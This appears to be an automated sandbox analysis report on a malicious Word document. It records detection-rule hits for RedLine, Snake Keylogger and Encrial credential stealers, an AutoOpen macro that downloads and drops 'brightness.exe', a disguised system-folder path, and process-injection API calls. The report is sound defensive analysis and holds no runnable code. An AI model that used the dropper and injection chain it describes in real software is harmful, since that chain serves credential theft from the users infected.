Source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.Nsltarpn.PIF.20f567a8.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.brightness.exe.218933d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.brightness.exe.21800948.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.3820791645.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000001.2446904495.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3820808397.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000F.00000001.2369555463.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: npratlsN.pif PID: 7716, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: npratlsN.pif PID: 8008, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: npratlsN.pif PID: 8188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: PI ITS15235 (2).doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, write			Name: AutoOpen

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: PI ITS15235 (2).doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, send			Name: AutoOpen

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to dropped file

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\InProcServer32			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32			Jump to behavior

PE file contains section with special chars

Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027982CC NtReadVirtualMemory,	7_2_027982CC
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279E064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	7_2_0279E064
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279853C NtUnmapViewOfSection,	7_2_0279853C
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02797A2C NtAllocateVirtualMemory,	7_2_02797A2C
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279DEF8 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile,	7_2_0279DEF8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279DF80 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	7_2_0279DF80
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02798C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	7_2_02798C28
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02797D78 NtWriteVirtualMemory,	7_2_02797D78
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02797A2A NtAllocateVirtualMemory,	7_2_02797A2A
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279DEA4 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile,	7_2_0279DEA4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02798C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	7_2_02798C26
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_028282CC NtReadVirtualMemory,	14_2_028282CC
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_0282E064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	14_2_0282E064
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_0282853C NtUnmapViewOfSection,	14_2_0282853C
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_02827A2C NtAllocateVirtualMemory,	14_2_02827A2C
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_02828C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	14_2_02828C28
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_02827D78 NtWriteVirtualMemory,	14_2_02827D78
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_028285C8 NtUnmapViewOfSection,	14_2_028285C8
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_02827A2A NtAllocateVirtualMemory,	14_2_02827A2A
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_0282DEA4 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	14_2_0282DEA4
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_0282DEF8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	14_2_0282DEF8
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_0282DF80 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	14_2_0282DF80
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 14_2_02828C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	14_2_02828C26

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02798654 CreateProcessAsUserW,

7_2_02798654

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	File created: C:\Windows\SysWOW64\brightness.exe	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \SysWOW64	Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

File deleted: C:\Windows \SysWOW64\svchost.pif

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027820C4	7_2_027820C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00408C60	13_2_00408C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_0040DC11	13_2_0040DC11
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00407C3F	13_2_00407C3F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00418CCC	13_2_00418CCC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00406CA0	13_2_00406CA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_004028B0	13_2_004028B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_0041A4BE	13_2_0041A4BE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00418244	13_2_00418244
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00401650	13_2_00401650
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00402F20	13_2_00402F20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_004193C4	13_2_004193C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00418788	13_2_00418788
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00402F89	13_2_00402F89
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00402B90	13_2_00402B90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_004073A0	13_2_004073A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1C87154F	13_2_1C87154F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1C871560	13_2_1C871560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1C8712B2	13_2_1C8712B2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1C8712C0	13_2_1C8712C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F908F88	13_2_1F908F88
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90AF00	13_2_1F90AF00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F905E58	13_2_1F905E58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90BD5F	13_2_1F90BD5F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90BA81	13_2_1F90BA81
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90AA58	13_2_1F90AA58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F905820	13_2_1F905820
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90B7A2	13_2_1F90B7A2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90D490	13_2_1F90D490
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90B4BF	13_2_1F90B4BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90B1E1	13_2_1F90B1E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F9041E1	13_2_1F9041E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90F0D7	13_2_1F90F0D7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90AC20	13_2_1F90AC20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90E5D8	13_2_1F90E5D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90E5E8	13_2_1F90E5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F90D481	13_2_1F90D481
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_1F903068	13_2_1F903068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C0040	13_2_209C0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CB580	13_2_209CB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C3508	13_2_209C3508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C8550	13_2_209C8550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C0E38	13_2_209C0E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C7A28	13_2_209C7A28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CCF90	13_2_209CCF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C0738	13_2_209C0738
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CDC98	13_2_209CDC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CDC88	13_2_209CDC88
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C7080	13_2_209C7080
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C34F8	13_2_209C34F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CE0F0	13_2_209CE0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CE0E1	13_2_209CE0E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C0006	13_2_209C0006
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CD830	13_2_209CD830
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CD840	13_2_209CD840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C7071	13_2_209C7071
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CE991	13_2_209CE991
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CE9A0	13_2_209CE9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CB9D8	13_2_209CB9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CB9C8	13_2_209CB9C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CEDF8	13_2_209CEDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CEDE9	13_2_209CEDE9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CE539	13_2_209CE539
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CE548	13_2_209CE548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C8542	13_2_209C8542
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CB578	13_2_209CB578
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CF69A	13_2_209CF69A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CC288	13_2_209CC288
